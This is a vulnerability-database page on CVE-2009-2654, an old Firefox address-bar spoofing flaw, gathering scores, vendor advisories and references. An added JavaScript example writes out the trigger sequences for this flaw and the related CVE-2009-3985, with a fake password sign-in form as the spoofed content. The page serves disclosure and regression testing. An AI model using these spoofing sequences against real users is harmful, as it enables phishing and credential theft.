CVE-2009-2654
Published: 2009-08-03
Priority: P4 · 25 · medium · CVSS 2.0: 5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P)
EPSS: 4.75% (90.7th percentile)
Mozilla Firefox before 3.0.13, and 3.5.x before 3.5.2, allows remote attackers to spoof the address bar, and possibly conduct phishing attacks, via a crafted web page that calls window.open with an invalid character in the URL, makes document.write calls to the resulting object, and then calls the stop method during the loading of the error page.
Affected
140 ranges; the two that carry version data:
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mozilla | firefox | <= 3.5.1 | — |
| mozilla | firefox | <= 3.0.15 | — |
Per the description above, the fixed releases are Firefox 3.0.13 and 3.5.2 (MFSA 2009-44); the "<= 3.0.15" range in the affected data is wider than the "before 3.0.13" stated in the description.
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 5.8 | MEDIUM | AV:N/AC:M/Au:N/C:N/I:P/A:P |
| vendor_redhat | — | 5.8 | MEDIUM | — |
GHSA
GHSA-4h5h-76c6-8744 (ghsa_unreviewed · 2022-05-02): CVE-2009-2654 [MEDIUM], CWE-20. Same description as above.
GHSA
GHSA-gfvv-6f6j-f63q (ghsa_unreviewed · 2022-05-02 · CVSS 5.8): CVE-2009-3985 [MEDIUM]
Mozilla Firefox before 3.0.16 and 3.5.x before 3.5.6, and SeaMonkey before 2.0.1, allows remote attackers to associate spoofed content with an invalid URL by setting document.location to this URL, and then writing arbitrary web script or HTML to the associated blank document, a related issue to CVE-2009-2654.
Red Hat
Mozilla URL spoofing via invalid document.location (vendor_redhat · 2009-12-15 · CVSS 5.8): CVE-2009-3985 [MEDIUM]. Same description as the GHSA entry above.
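The two call sequences the advisories describe, CVE-2009-2654 (window.open on an invalid URL, document.write into the new window, stop() during the error-page load) and the related CVE-2009-3985 (document.location set to an invalid URL, then document.write into the resulting blank document), written out as an added example. This is not code from this page, from Mozilla, or from the original PoC. The functions take a window-like object, so the same code can drive a real browser window when regression-testing a build, or the recording stub below when run offline. The trigger URL, the spoof body, and the function names are assumptions of this example; the page does not state which "invalid character" the original PoC used.

```javascript
'use strict';

// Constructed sample body an attacker would write into the spoofed document.
const SPOOF_HTML = '<h1>Sign in</h1><form><input name="pw" type="password"></form>';

// Assumption (not stated on the page): a space inside the host is used as the
// stand-in "invalid character"; the original PoC's exact character is not given.
const INVALID_URL = 'http://exa mple.com/login';

// True when the WHATWG URL parser accepts the string. Used only to confirm that
// the chosen trigger really is malformed, which is the precondition of both bugs.
function isWellFormedUrl(s) {
  try { new URL(s); return true; } catch (e) { return false; }
}

// CVE-2009-2654: open the invalid URL, write into the new window while its
// error page is still loading, then stop that load so the written content stays.
function cve2009_2654Sequence(win, invalidUrl, html) {
  const popup = win.open(invalidUrl);
  popup.document.write(html);
  popup.stop();
  return popup;
}

// CVE-2009-3985: navigate the current document to the invalid URL, then write
// into the blank document that replaces it.
function cve2009_3985Sequence(win, invalidUrl, html) {
  win.document.location = invalidUrl;
  win.document.write(html);
  return win;
}

// Recording stub standing in for a browser window. It does not reproduce the
// bugs (a fixed browser renders an error page under the real URL); it only
// records which calls were made, on which window, in which order.
function makeRecordingWindow(log, name = 'main') {
  const doc = {
    href: 'about:blank',
    body: '',
    get location() { return this.href; },
    set location(url) { log.push(`${name}:location=${url}`); this.href = url; },
    write(html) { log.push(`${name}:write`); this.body = html; },
  };
  return {
    document: doc,
    open(url) {
      log.push(`${name}:open=${url}`);
      return makeRecordingWindow(log, 'popup');
    },
    stop() { log.push(`${name}:stop`); },
  };
}

// Drives both sequences against the stub and returns the recorded call logs
// together with the state each sequence leaves behind.
function recordSequences(invalidUrl = INVALID_URL, html = SPOOF_HTML) {
  const log2654 = [];
  const popup = cve2009_2654Sequence(makeRecordingWindow(log2654), invalidUrl, html);
  const log3985 = [];
  const main = cve2009_3985Sequence(makeRecordingWindow(log3985), invalidUrl, html);
  return {
    log2654,
    log3985,
    popupBody: popup.document.body,
    mainLocation: main.document.location,
  };
}

// In a browser, run e.g. cve2009_2654Sequence(window, INVALID_URL, SPOOF_HTML)
// on a pre-3.0.13 / pre-3.5.2 build and compare the location bar with the
// rendered body; a fixed build shows an error page under the real URL.
if (typeof window === 'undefined' && typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(recordSequences(), null, 2));
}
```

The stub deliberately models only the call order: whether the location bar ends up showing a trusted-looking URL over attacker-written content is the browser's behaviour, and can only be observed by running the same functions against a real window. Note the Ubuntu advisory's point that a valid SSL certificate on the attacker's site made the spoofed page appear trusted, so the body written here would have carried the lock indicator as well.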
Ubuntu
Firefox and Xulrunner vulnerability (vendor_ubuntu · 2009-08-08): CVE-2009-2654
Juan Pablo Lopez Yacubian discovered that Firefox did not properly display invalid URLs. If a user were tricked into accessing a malicious website, an attacker could exploit this to spoof the location bar, such as in a phishing attack. Furthermore, if the malicious website had a valid SSL certificate, Firefox would display the spoofed page as trusted.
Instructions: After a standard system upgrade you need to restart Firefox and any applications that use xulrunner, such as Epiphany, to effect the necessary changes.
Red Hat
firefox: URL bar spoofing vulnerability (vendor_redhat · 2009-07-24 · CVSS 5.8): CVE-2009-2654 [MEDIUM]. Same description as above.
No detection rules found.
References
- http://blog.mozilla.com/security/2009/07/28/url-bar-spoofing-vulnerability/
- http://es.geocities.com/jplopezy/firefoxspoofing.html
- http://osvdb.org/56717
- http://secunia.com/advisories/36001
- http://secunia.com/advisories/36126
- http://secunia.com/advisories/36141
- http://secunia.com/advisories/36435
- http://secunia.com/advisories/36669
- http://secunia.com/advisories/36670
- http://sunsolve.sun.com/search/document.do?assetkey=1-66-266148-1
- http://www.debian.org/security/2009/dsa-1873
- http://www.mozilla.org/security/announce/2009/mfsa2009-44.html
- http://www.redhat.com/support/errata/RHSA-2009-1430.html
- http://www.redhat.com/support/errata/RHSA-2009-1431.html
- http://www.redhat.com/support/errata/RHSA-2009-1432.html
- http://www.securityfocus.com/archive/1/505242/30/0/threaded
- http://www.securityfocus.com/archive/1/505265
- http://www.securityfocus.com/bid/35803
- http://www.securitytracker.com/id?1022603
- http://www.vupen.com/english/advisories/2009/2006
- http://www.vupen.com/english/advisories/2009/2142
- https://bugzilla.mozilla.org/show_bug.cgi?id=451898
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9686
- https://usn.ubuntu.com/811-1/
- https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00198.html
- https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00261.html